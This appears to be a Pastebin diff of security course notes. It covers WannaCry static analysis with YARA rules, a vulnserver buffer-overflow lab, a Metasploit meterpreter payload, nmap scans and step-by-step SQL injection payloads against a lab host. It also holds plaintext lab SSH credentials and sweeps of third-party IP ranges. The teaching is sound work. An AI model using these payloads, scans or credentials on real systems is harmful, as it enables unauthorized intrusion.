View difference between Paste ID: <a href="/kJc1yz14">kJc1yz14</a> and <a href="/UB868q2s">UB868q2s</a> - Pastebin.com

View difference between Paste ID: kJc1yz14 and UB868q2s

SHOW: | | - or go back to the newest paste.

1		#####################################################
2	-	# Setup your CentOS 7 host #
2	+	# Offensive/Defensive Cyber (New ECSA 2019) #
3		# By Joe McCray #
4	-	yum update
4	+
5	-	yum install -y nmap python2-scapy.noarch python34-scapy.noarch whois.x86_64 tcpdump.x86_64 unzip wget tcpflow.x86_64
5	+
6		- Here is a good set of slides for getting started with Linux:
7		http://www.slideshare.net/olafusimichael/linux-training-24086319
8
9	-	################
9	+
10	-	# The Scenario #
10	+	- Here is a good tutorial that you should complete before doing the labs below:
11	-	################
11	+	http://linuxsurvival.com/linux-tutorial-introduction/
12	-	You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
12	+
13
14		- I prefer to use Putty to SSH into my Linux host.
15	-	The fastest thing you can do is perform static analysis.
15	+	- You can download Putty from here:
16		- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
17
18		Here is the information to put into putty
19	-	###################
19	+
20	-	# Static Analysis #
20	+	Host Name: 107.191.39.106
21	-	###################
21	+	protocol: ssh
22		port: 22
23	-	- After logging please open a terminal window and type the following commands:
23	+	username: ecsa
24		password: GermanyNewYork!#
25
26
27	-	mkdir malware_analysis
27	+
28
29	-	cd malware_analysis
29	+
30
31	-	wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
31	+	mkdir static_analysis
32
33		cd static_analysis
34
35		wget http://45.63.104.73/wannacry.zip
36
37		unzip wannacry.zip
38		infected
39
40		file wannacry.exe
41
42		mv wannacry.exe malware.pdf
43
44		file malware.pdf
45
46		mv malware.pdf wannacry.exe
47
48		hexdump -n 2 -C wannacry.exe
49
50		----------------------------------------------------------------------
51
52
53		*What is '4d 5a' or 'MZ'*
54		-------------------------Paste this URL into Firefox-----------------------------------
55		http://www.garykessler.net/library/file_sigs.html
56		---------------------------------------------------------------------------------------
57
58
59
60		---------------------------Type This-----------------------------------
61	-	strings --all wannacry.exe \| head -n 6
61	+
62
63		strings wannacry.exe
64
65		strings wannacry.exe \| grep -i dll
66
67		strings wannacry.exe \| grep -i library
68
69		strings wannacry.exe \| grep -i reg
70
71		strings wannacry.exe \| grep -i key
72
73		strings wannacry.exe \| grep -i rsa
74
75		strings wannacry.exe \| grep -i open
76
77		strings wannacry.exe \| grep -i get
78
79		strings wannacry.exe \| grep -i mutex
80
81		strings wannacry.exe \| grep -i irc
82
83		strings wannacry.exe \| grep -i join
84
85		strings wannacry.exe \| grep -i admin
86
87		strings wannacry.exe \| grep -i list
88		----------------------------------------------------------------------
89
90
91
92
93
94		---------------------------Type This-----------------------------------
95		pe info wannacry.exe
96		pe check wannacry.exe
97		pe dump --section text wannacry.exe
98		pe dump --section data wannacry.exe
99		pe dump --section rsrc wannacry.exe
100		pe dump --section reloc wannacry.exe
101		strings rdata \| less
102		strings rsrc \| less
103		strings text \| less
104		----------------------------------------------------------------------
105
106
107
108
109
110
111
112
113		Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
114
115		Quick Google search for "wannacry ransomeware analysis"
116
117
118		Reference
119		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
120
121		- Yara Rule -
122
123
124		Strings:
125		$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
126		$s2 = “Wanna Decryptor” wide ascii nocase
127		$s3 = “.wcry” wide ascii nocase
128		$s4 = “WANNACRY” wide ascii nocase
129		$s5 = “WANACRY!” wide ascii nocase
130		$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
131
132
133
134
135
136
137
138		Ok, let's look for the individual strings
139
140
141		---------------------------Type This-----------------------------------
142		strings wannacry.exe \| grep -i ooops
143
144		strings wannacry.exe \| grep -i wanna
145
146		strings wannacry.exe \| grep -i wcry
147
148		strings wannacry.exe \| grep -i wannacry
149	-	https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
149	+
150		strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
151		----------------------------------------------------------------------
152
153
154
155
156
157		####################################
158		# Tired of GREP - let's try Python #
159		####################################
160		Decided to make my own script for this kind of stuff in the future. I
161
162		Reference1:
163		http://45.63.104.73/analyse_malware.py
164
165		This is a really good script for the basics of static analysis
166	-	wget https://files.pythonhosted.org/packages/ed/cc/157f20038a80b6a9988abc06c11a4959be8305a0d33b6d21a134127092d4/pefile-2018.8.8.tar.gz
166	+
167	-	tar -zxvf pefile-2018.8.8.tar.gz
167	+
168	-	cd pefile-2018.8.8
168	+
169	-	python setup.py install
169	+
170	-	cd ..
170	+
171		This is really good for showing some good signatures to add to the Python script
172
173
174		Here is my own script using the signatures (started this yesterday, but still needs work):
175		https://pastebin.com/guxzCBmP
176
177
178
179		---------------------------Type This-----------------------------------
180	-	vi am.py
180	+
181
182	-	python am.py wannacry.exe
182	+
183		mv guxzCBmP am.py
184
185
186		nano am.py
187
188		python2.7 am.py wannacry.exe
189		----------------------------------------------------------------------
190	-	# Reference: #
190	+
191	-	# https://jon.glass/analyzes-dridex-malware-p1/ #
191	+
192
193		##############
194	-	yum -y install epel-release
194	+	# Yara Ninja #
195	-	yum -y install python-pip
195	+	##############
196	-	pip install -U olefile
196	+
197	-
197	+
198		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
199	-	mkdir oledump
199	+
200		----------------------------------------------------------------------------
201	-	cd oledump
201	+	rule wannacry_1 : ransom
202		{
203		meta:
204		author = "Joshua Cannell"
205		description = "WannaCry Ransomware strings"
206		weight = 100
207	-	wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
207	+	date = "2017-05-12"
208
209		strings:
210		$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
211		$s2 = "Wanna Decryptor" wide ascii nocase
212		$s3 = ".wcry" wide ascii nocase
213		$s4 = "WANNACRY" wide ascii nocase
214		$s5 = "WANACRY!" wide ascii nocase
215		$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
216
217		condition:
218		any of them
219		}
220
221		----------------------------------------------------------------------------
222		rule wannacry_2{
223		meta:
224		author = "Harold Ogden"
225		description = "WannaCry Ransomware Strings"
226		date = "2017-05-12"
227		weight = 100
228
229		strings:
230		$string1 = "msg/m_bulgarian.wnry"
231		$string2 = "msg/m_chinese (simplified).wnry"
232		$string3 = "msg/m_chinese (traditional).wnry"
233		$string4 = "msg/m_croatian.wnry"
234		$string5 = "msg/m_czech.wnry"
235		$string6 = "msg/m_danish.wnry"
236		$string7 = "msg/m_dutch.wnry"
237		$string8 = "msg/m_english.wnry"
238		$string9 = "msg/m_filipino.wnry"
239		$string10 = "msg/m_finnish.wnry"
240	-	----------------------------------------------------------------------------------------------------------------------------
240	+	$string11 = "msg/m_french.wnry"
241		$string12 = "msg/m_german.wnry"
242		$string13 = "msg/m_greek.wnry"
243		$string14 = "msg/m_indonesian.wnry"
244		$string15 = "msg/m_italian.wnry"
245		$string16 = "msg/m_japanese.wnry"
246		$string17 = "msg/m_korean.wnry"
247		$string18 = "msg/m_latvian.wnry"
248	-	mkdir -p pcap_analysis/chaos_reader/
248	+	$string19 = "msg/m_norwegian.wnry"
249		$string20 = "msg/m_polish.wnry"
250		$string21 = "msg/m_portuguese.wnry"
251		$string22 = "msg/m_romanian.wnry"
252	-	wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
252	+	$string23 = "msg/m_russian.wnry"
253		$string24 = "msg/m_slovak.wnry"
254	-	wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
254	+	$string25 = "msg/m_spanish.wnry"
255		$string26 = "msg/m_swedish.wnry"
256		$string27 = "msg/m_turkish.wnry"
257		$string28 = "msg/m_vietnamese.wnry"
258
259
260		condition:
261		any of ($string*)
262		}
263		----------------------------------------------------------------------------
264
265	-	/sbin/iptables -F
265	+
266
267
268
269
270
271	-	###########################
271	+
272	-	# Setting up your machine #
272	+
273	-	###########################
273	+
274		---------------------------Type This-----------------------------------
275		mkdir ~/oledump
276	-	yum -y groupinstall 'Development Tools'
276	+
277	-	yum install -y libpcap-devel.i686 libpcap-devel.x86_64 libpcap.i686 libpcap.x86_64 pcapy.x86_64 p0f.x86_64 perl tcpdump python-docutils git gcc pcre-devel.i686 pcre-devel.x86_64 glibc-static
277	+	cd ~/oledump
278
279	-	cd ~/pcap_analysis/
279	+
280	-	git clone git://github.com/gamelinux/prads.git
280	+
281	-	cd prads
281	+
282	-	make
282	+
283	-	make install
283	+	wget http://45.63.104.73/064016.zip
284
285	-	wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
285	+
286		infected
287
288		python oledump.py 064016.doc
289
290		python oledump.py 064016.doc -s A4 -v
291		-----------------------------------------------------------------------
292
293	-	# Creating a Malware Database #
293	+
294
295	-	Creating a malware database (mysql)
295	+
296	-	-----------------------------------
296	+
297	-	- Step 1: Installing MySQL database
297	+
298	-	- Run the following command in the terminal:
298	+
299		python oledump.py 064016.doc -s A5 -v
300	-	yum install -y mariadb-server MySQL-python.x86_64 mysql-connector-python.noarch python2-PyMySQL.noarch mariadb.x86_64 mariadb-devel.x86_64 mariadb-libs.x86_64
300	+
301
302	-
302	+
303	-	- Step 2: Configure the database to accept large files by adding 'max_allowed_packet = 16M' to the /etc/my.cnf file
303	+
304		---------------------------Type This-----------------------------------
305	-	vi /etc/my.cnf
305	+
306	-	max_allowed_packet = 16M
306	+
307		- Look for "GVhkjbjv" and you should see:
308
309	-	Step 3: Start MariaDB
309	+
310	-	- Run the following command in the terminal:
310	+
311		- Take that long blob that starts with 636D and finishes with 653B and paste it in:
312	-	systemctl enable mariadb
312	+
313	-	systemctl start mariadb
313	+
314
315
316	-	Step 4: Logging in
316	+
317	-	Run the following command in the terminal:
317	+	Step 1: Download Nmap
318		--------------------
319	-	mysql -u root -p (set a password of 'malware')
319	+	Windows: https://nmap.org/dist/nmap-7.70-setup.exe
320		Mac OS X: https://nmap.org/dist/nmap-7.70.dmg
321	-	use mysql;
321	+
322	-	update user SET PASSWORD=PASSWORD("malware") WHERE USER='root';
322	+	Linux:
323	-	flush privileges;
323	+	--- Fedora/CentOS/RHEL: sudo yum install -y nmap
324	-	create database malware;
324	+	--- Ubuntu/Mint/Debian: sudo apt-get install -y nmap
325	-	grant all on malware.* to 'root' identified by 'malware';
325	+
326	-	exit;
326	+
327
328		########################
329		# Scanning Methodology #
330		########################
331	-	Step 5: Configure the database setup script
331	+
332	-	---------------------------Type This-----------------------------------
332	+
333	-	wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
333	+
334		------------
335	-	vi mal_to_db.py (fill in database connection information)
335	+	Note: On windows you won't need to use the word "sudo" in front of the command below:
336
337	-	python mal_to_db.py -i
337	+	---------------------------On Linux or Mac OS X type This-----------------------------------
338		sudo nmap -sP 157.166.226.*
339
340		---------------------------or on Windows type:---------------------------------------------
341	-	Step 6: check it to see if the files table was created
341	+	c:\nmap -sP 157.166.226.*
342	-	--------------------------Type This-----------------------------------
342	+
343	-	mysql -u root -p
343	+	--------------------------------------------------------------------------------------------
344	-	malware
344	+
345
346	-	show databases;
346	+
347		-if -SP yields no results try:
348	-	use malware;
348	+	Note: On windows you won't need to use the word "sudo" in front of the command below:
349		---------------------------On Linux or Mac OS X type This-----------------------------------
350	-	show tables;
350	+
351
352	-	describe files;
352	+	---------------------------or on Windows type:---------------------------------------------
353		c:\nmap -sL 157.166.226.*
354	-	exit;
354	+
355		------------------------------------------------------------------------------------------
356	-	---------------------------------
356	+
357
358
359	-	Step 7: Now add the malicious file to the DB
359	+
360		Note: On windows you won't need to use the word "sudo" in front of the command below:
361	-	wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
361	+	---------------------------On Linux or Mac OS X type This-----------------------------------
362		sudo nmap -sL 157.166.226.* \| grep com
363
364		---------------------------or on Windows type:---------------------------------------------
365		c:\nmap -sP 157.166.226.* \| findstr "cnn"
366	-	python mal_to_db.py -f wannacry.exe -u
366	+
367	-	------------------------------------------------------------------------
367	+	-------------------------------------------------------------------------------------------
368
369
370	-	Step 8: Now check to see if it is in the DB
370	+
371		- Port Scan
372	-	mysql -u root -p
372	+
373	-	malware
373	+
374		Note: On windows you won't need to use the word "sudo" in front of the command below:
375	-	mysql> use malware;
375	+	---------------------------On Linux or Mac OS X type This-----------------------------------
376		sudo nmap -sS 162.243.126.247
377	-	select id,md5,sha1,sha256,time FROM files;
377	+
378		---------------------------or on Windows type:----------------------------------------------
379	-	mysql> quit;
379	+	c:\nmap -sS 162.243.126.247
380
381		--------------------------------------------------------------------------------------------
382
383	-	-------------------------------------------------
383	+
384	-	1. App Type
384	+
385	-	- Stand Alone
385	+
386	-	- Client Server (*vulnserver.exe*)
386	+
387	-	- Web App
387	+
388		Note: On windows you won't need to use the word "sudo" in front of the command below:
389	-	2. Input Type
389	+	---------------------------On Linux or Mac OS X type This-----------------------------------
390	-	- Stand Alone File/Keyboard/Mouse
390	+
391	-	- Client Server Logical network port (*9999*)
391	+
392	-	- Web App Browser
392	+	---------------------------or on Windows type:---------------------------------------------
393		c:\nmap -sV 162.243.126.247
394		-------------------------------------------------------------------------------------------
395	-	3. Map and fuzz app entry points
395	+
396	-	- Commands, Methods, Verbs, functions, controllers, subroutines
396	+
397	-	TRUN 2100
397	+
398		Let's dig into this a little bit more:
399	-	4. Isolate the crash
399	+
400	-	EIP = 39 6F 43 38
400	+	Note: On windows you won't need to use the word "sudo" in front of the command below:
401	-	9 o C 8
401	+	---------------------------On Linux or Mac OS X type This-----------------------------------
402		sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443
403	-	5. Calculate distance to EIP
403	+
404	-	2006
404	+	---------------------------or on Windows type:---------------------------------------------
405		c:\nmap -sV --script=http-headers 162.243.126.247 -p 80,443
406	-	6. Redirect code execution to mem location you control
406	+	-------------------------------------------------------------------------------------------
407
408	-	7. Insert payload (shellcode)
408	+
409	-	--------------------------------------------------------------
409	+
410		- Vulnerability Research
411		Lookup the banner versions for public exploits
412		----------------------------------------------
413		http://exploit-db.com
414	-	#######################
414	+
415	-	----------------------------# Exploit Development #----------------------------
415	+
416	-	#######################
416	+
417		---------------------------------------------------------------------------------------------------------------------------------
418
419
420
421	-	# VMs for this course #
421	+	Network Penetration Testing Process (known vulnerabilities)
422		-----------------------------------------------------------
423	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
423	+
424	-	username: workshop
424	+
425	-	password: password
425	+	1. Ping Sweep:
426		The purpose of this step is to identify live hosts
427	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
427	+
428	-	user: infosecaddicts
428	+	nmap -sP <ip-address/ip-range>
429	-	pass: infosecaddicts
429	+
430
431	-	You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
431	+	2. Port Scan
432		Identify running services. We use the running services to map the network topology.
433
434		nmap -sS <ip-address/ip-range>
435
436
437	-	#######################################################
437	+	3. Bannergrab
438	-	# Files you may find helpful for learning Exploit Dev #
438	+	Identify the version of version of software running on each port
439	-	#######################################################
439	+
440	-	https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
440	+	nmap -sV <ip-address/ip-range>
441
442
443
444		4. Vulnerability Research
445		Use the software version number to research and determine if it is out of date (vulnerable).
446
447		exploit-db.com/search
448
449
450
451	-	https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
451	+
452	-	https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
452	+
453
454
455
456
457	-	- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
457	+	Skill Level 1. Run the scanners
458		-------------------------------
459		Nexpose
460		Qualys
461		Retina
462		Nessus known vulnerabilities
463		OpenVas
464		Foundscan
465		GFI LanGuard
466		NCircle
467
468
469		Skill Level 2. Manual vulnerability validation (known vulnerabilities)
470		-----------------------------------------------------------------------
471
472		windows -> systeminfo
473		Linux-> dpkg -l
474		rpm -qa
475
476
477
478
479
480
481
482		#####################################
483		# Quick Stack Based Buffer Overflow #
484		#####################################
485
486		- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
487		http://45.63.104.73/ExploitLab.zip
488
489
490		- Extract the ExploitLab.zip file to your Desktop
491
492		- Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe
493
494
495
496		- Open a new command prompt and type:
497
498		---------------------------Type This-----------------------------------
499		nc localhost 9999
500		--------------------------------------------------------------------------
501
502		If you don't have netcat you can download it from here:
503		http://45.63.104.73/nc-password-is-netcat.zip
504
505		The file nc.zip is password protected (password is 'password'), you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.
506
507
508		- In the new command prompt window where you ran nc type:
509		HELP
510	-	cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
510	+
511		- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
512	-	vi vulnserv.rb (paste the code into this file)
512	+
513
514		- Now double-click on 1-simplefuzzer.py
515	-	cd ~/toolz/metasploit
515	+
516
517	-	./msfconsole
517	+
518		- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
519
520		- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
521	-	use exploit/windows/misc/vulnserv
521	+
522	-	set PAYLOAD windows/meterpreter/bind_tcp
522	+
523	-	set RHOST CHANGEME-TO-YOUR-WIN7-IP
523	+
524	-	set RPORT 9999
524	+
525	-	exploit
525	+
526		- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
527
528		- Calculate the distance to EIP by running script 3-3000chars.py
529		- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
530
531		4-count-chars-to-EIP.py
532		- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
533		- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
534
535		5-2006char-eip-check.py
536		- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
537
538		6-jmp-esp.py
539		- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
540
541		7-first-exploit
542		- In this script we actually do the stack overflow and launch a bind shell on port 4444
543
544		8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
545
546	-	https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
546	+
547		------------------------------
548
549
550
551		Skill Level 3. Identify unknown vulnerabilities
552	-	1. What does the sys module do? Call System Commands
552	+	-----------------------------------------------
553
554		- App Type
555		------------
556		Stand Alone Client Server Web App
557
558		*(vulnerserver.exe)*
559
560	-	2. What pattern_create.rb doing and where can I find it?
560	+
561		- Input TYpe
562		-------------
563		FIle logical network port Browser
564		Keyboard
565		Mouse
566
567
568
569		*(9999)*
570
571
572		- Map & Fuzz app entry points:
573	-	1. Explain what is happening in lines 13 - to 15.
573	+
574		- Commands *(commands)*
575		- Methods
576		- Verbs
577		- functions
578		- subroutines
579	-	Ff5.py
579	+	- controllers
580
581
582		- Isolate the crash
583		-------------------
584		App seems to reliably crash at TRUN 2100
585
586
587		- Calculate the distance to EIP
588		-------------------------------
589		Distance to EIP is 2006
590
591		We found that EIP was populated with the value: 396F4338
592		396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
593
594		An online tool that we can use for this is:
595		https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
596
597
598
599		- Redirect Program Execution
600		----------------------------
601		A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
602		We learned that we control EAX and ESP in script 2.
603
604
605
606
607
608		- Implement Shellcode
609		---------------------
610		There are only 2 things that can go wrong with shellcode:
611		- Not enough space
612		- Bad characters
613
614
615
616
617
618
619		#########################################
620		# FreeFloat FTP Server Exploit Analysis #
621		#########################################
622
623
624
625		Analyze the following exploit code:
626		https://www.exploit-db.com/exploits/15689/
627
628	-	#################################
628	+
629	-	# Scripts to install Metasploit #
629	+
630	-	#################################
630	+
631		4. Describe what is happening in the variable ‘junk2’
632
633	-	-----------------1st script-------------------------------
633	+
634	-	#!/bin/bash
634	+
635	-	# Setup CentOS 7 for Metasploit
635	+
636		Analysis of the training walk-through based on EID: 15689:
637	-	# Ensure script is running as root #
637	+	http://45.63.104.73/ff.zip
638
639	-	if [[ $EUID -ne 0 ]]; then
639	+
640	-	echo "This script must be run as root"
640	+
641	-	exit 1
641	+
642	-	fi
642	+
643		1. What does the sys module do?
644		2. What is sys.argv[1] and sys.argv[2]?
645	-	##########################
645	+
646	-	# Set up the CentOS host #
646	+
647	-	##########################
647	+
648	-	yum update
648	+
649	-	yum -y groupinstall 'Development Tools'
649	+
650	-	yum install -y libpcap-devel.i686 libpcap-devel.x86_64 libpcap.i686 libpcap.x86_64 pcapy.x86_64 p0f.x86_64 perl tcpdump python-docutils git gcc pcre-devel.i686 pcre-devel.x86_64 glibc-static nmap python2-scapy.noarch python34-scapy.noarch whois.x86_64 tcpdump.x86_64 unzip wget tcpflow.x86_64 sqlite rubygem-sqlite3 ruby-irb rubygems rubygem-bigdecimal rubygem-rake rubygem-i18n rubygem-bundler ruby-devel libpcap-devel git svn postgresql-server postgresql-devel sqlite-devel git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
650	+
651	-	yum -y install epel-release
651	+	2. What is pattern_create.rb doing and where can I find it?
652	-	yum -y install python-pip
652	+
653	-	pip install -U olefile
653	+
654	-	yum install yum-utils -y
654	+
655	-	cd /usr/local/
655	+
656	-	rm -rf rvm/
656	+
657	-	yum-builddep -y ruby
657	+
658	-	gpg2 --keyserver hkp://keys.gnupg.net --recv-keys
658	+
659	-	command curl -sSL https://rvm.io/mpapis.asc \| gpg2 --import -
659	+
660	-	curl -L get.rvm.io \| bash -s stable
660	+
661	-	source /etc/profile.d/rvm.sh
661	+
662	-	chmod -R 777 /usr/local/rvm/
662	+
663	-	rvm install "ruby-2.5.1"
663	+
664	-	gem install rails
664	+	1. Explain what is happening in lines 13 to 15.
665	-	bundle install
665	+
666		3. What is the total length of buff?
667	-	-------------------------2nd script-----user script-----------------------------------------------------------------------
667	+
668
669
670	-	#!/bin/bash
670	+	ff5.py
671		1. Explain what is happening in line 15.
672	-	# Setup CentOS 7 for Metasploit
672	+
673	-	########################################
673	+
674	-	# Ensure script is NOT running as root #
674	+
675	-	########################################
675	+
676	-	if [ $UID -eq 0 ] ; then
676	+
677	-	echo "This script must NOT be run as root"
677	+
678	-	echo "Make sure you are a regular user in your home directory when you run this script"
678	+
679	-	exit 1
679	+
680	-	fi
680	+
681
682
683
684	-	rm -rf .rvm/
684	+
685	-	rm -rf metasploit-framework/
685	+
686	-	git clone git://github.com/rapid7/metasploit-framework.git
686	+
687	-	cd metasploit-framework/
687	+
688	-	gpg2 --keyserver hkp://keys.gnupg.net --recv-keys
688	+
689	-	command curl -sSL https://rvm.io/mpapis.asc \| gpg2 --import -
689	+
690	-	cd metasploit-framework/
690	+
691	-	curl -L get.rvm.io \| bash -s stable
691	+
692	-	cd metasploit-framework/
692	+
693	-	source /etc/profile.d/rvm.sh
693	+
694	-	rvm install "ruby-2.5.1"
694	+
695	-	gem install rails
695	+
696	-	gem install rake
696	+
697	-	gem install rex-ole
697	+
698	-	bundle install
698	+
699	-	./msfconsole
699	+
700		ff9.py
701		1. What is going on in lines 19 and 20?
702	-	-------------------------------------------------------------------------------------------------------------
702	+
703		3. From what DLL did the address of the JMP ESP come from?
704
705	-	# Day 3: Ruby Fundamentals #
705	+
706
707
708		ff010.py
709		1. What is going on in lines 18 - 20?
710	-	- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
710	+
711	-	scientist and programmer from Japan. It is a cross-platform dynamic language.
711	+
712
713	-	- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
713	+
714	-	on Rails is a framework that is written in Ruby.
714	+
715		##################################
716	-	- Ruby's file name extensions are .rb and .rbw.
716	+
717		Most people are going to tell you reference the OWASP Testing guide.
718	-	- official website of this
718	+
719
720	-	- language: www.ruby-lang.org.
720	+
721
722
723	-	- interactive Shell called Ruby Shell
723	+
724
725		1. Does the website talk to a DB?
726	-	- Installing and Running IRB
726	+
727		- If yes - try SQL Injection
728
729	-	ruby -v
729	+
730		- If yes - try XSS
731
732		3. Does the page reference a file?
733	-	If you don't have ruby2.3 use the commands below:
733	+
734
735	-	sudo apt-get install ruby2.3 ruby2.3-dev ruby2.3-doc irb rdoc ri
735	+	Let's start with some manual testing against 45.63.104.73
736
737
738	-	- open up the interactive console and play around.
738	+
739		# Attacking PHP/MySQL #
740		#######################
741	-	irb
741	+
742		Go to LAMP Target homepage
743		http://45.63.104.73/
744
745	-	- Math, Variables, Classes, Creating Objects and Inheritance
745	+
746
747		Clicking on the Acer Link:
748	-	The following arithmetic operators:
748	+
749	-	Addition operator (+) — 10 + 23
749	+
750	-	Subtraction operator (-) — 1001 - 34
750	+	- Found parameter passing (answer yes to question 1)
751	-	Multiplication operator () — 5 5
751	+	- Insert ' to test for SQLI
752	-	Division operator (/) — 12 / 2
752	+
753		---------------------------Type This-----------------------------------
754
755		http://45.63.104.73/acre2.php?lap=acer'
756	-	- Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
756	+
757	-	operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
757	+
758	-	30. Again, 69 is assigned to y, and then y is incremented by 33.
758	+
759		Page returns the following error:
760		You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
761	-	x = 25
761	+
762	-	x + 30
762	+
763	-	y = 69
763	+
764	-	y+33
764	+
765		We do this using the ORDER BY
766
767		---------------------------Type This-----------------------------------
768
769	-	- Let's look at creating classes and creating objects.
769	+
770		-----------------------------------------------------------------------
771	-	- Here, the name of the class is Attack. An object has its properties and methods.
771	+
772		Page returns the following error:
773		Unknown column '100' in 'order clause'
774
775	-	class Attack
775	+
776	-	attr_accessor :of, :sqli, :xss
776	+
777	-	end
777	+
778		http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
779		-----------------------------------------------------------------------
780
781	-	What is nil?
781	+
782		Unknown column '50' in 'order clause'
783	-	https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
783	+
784
785	-	nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
785	+
786
787	-	Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
787	+
788		-----------------------------------------------------------------------
789	-	To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
789	+
790		Page returns the following error:
791		Unknown column '25' in 'order clause'
792
793
794		---------------------------Type This-----------------------------------
795	-	# Now that we have created the classes let's create the objects
795	+
796		http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
797	-	first_attack = Attack.new
797	+
798	-	first_attack.of = "stack"
798	+
799	-	first_attack.sqli = "blind"
799	+
800	-	first_attack.xss = "dom"
800	+
801	-	puts first_attack.of
801	+
802	-	puts first_attack.sqli
802	+
803	-	puts first_attack.xss
803	+
804
805		http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
806		-----------------------------------------------------------------------
807
808		---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
809	-	- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
809	+
810	-	inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
810	+
811	-	one object can access the properties/attributes of another object of a different class. Inheritance makes your
811	+
812	-	programming life easier by maximizing code reuse.
812	+
813
814		Reference:
815		http://www.techonthenet.com/sql/union.php
816	-	class Exploitframeworks
816	+
817	-	attr_accessor :scanners, :exploits, :shellcode, :postmodules
817	+
818	-	end
818	+
819	-	class Metasploit < Exploitframeworks
819	+
820	-	end
820	+
821	-	class Canvas < Exploitframeworks
821	+
822	-	end
822	+
823	-	class Coreimpact < Exploitframeworks
823	+
824	-	end
824	+
825	-	class Saint < Exploitframeworks
825	+
826	-	end
826	+
827	-	class Exploitpack < Exploitframeworks
827	+
828	-	end
828	+
829		-----------------------------------------------------------------------
830
831		We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
832
833
834	-	- Methods, More Objects, Arguments, String Functions and Expression Shortcuts
834	+
835		http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
836	-	- Let's create a simple method. A method is used to perform an action and is generally called with an object.
836	+
837		---------------------------Type This-----------------------------------
838	-	- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
838	+
839	-	it will print this string: "We are Learning how to PenTest"
839	+
840
841	-	- An object named 'bo' is created, which is used to call the method.
841	+
842
843		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
844
845	-	class Msfnl
845	+
846	-	def learning
846	+
847	-	puts "We are Learning how to PenTest"
847	+
848	-	end
848	+
849	-	end
849	+
850		-----------------------------------------------------------------------
851
852	-	#Now let's define an object for our Method
852	+
853
854		########################
855	-	joe = Msfnl.new
855	+	# Question I get a lot #
856	-	joe.learning
856	+
857		Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
858
859		Here is a good reference for it:
